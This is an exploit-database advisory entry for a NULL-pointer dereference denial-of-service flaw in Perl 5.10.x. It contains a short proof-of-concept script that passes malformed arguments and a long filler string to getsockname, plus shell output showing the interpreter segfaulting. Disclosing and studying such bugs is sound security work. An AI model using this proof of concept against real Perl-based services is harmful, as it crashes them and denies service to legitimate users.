Perl NULL-pointer Dereference Denial-of-Service Vulnerability

vendor:

Perl

by:

Unknown

7.5

CVSS

HIGH

NULL-pointer Dereference Denial-of-Service

476

CWE

Product Name: Perl

Affected Version From: Perl 5.10.x

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:perl:perl:5.10

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Perl NULL-pointer Dereference Denial-of-Service Vulnerability

An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47766/info

Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.

An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.

Perl versions 5.10.x are vulnerable. 

jonathan () blackbox:~/test$ cat poc1.pl
    #!/usr/bin/perl
    $a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
    jonathan () blackbox:~/test$ perl poc1.pl
    Segmentation fault (core dumped)
    jonathan () blackbox:~/test$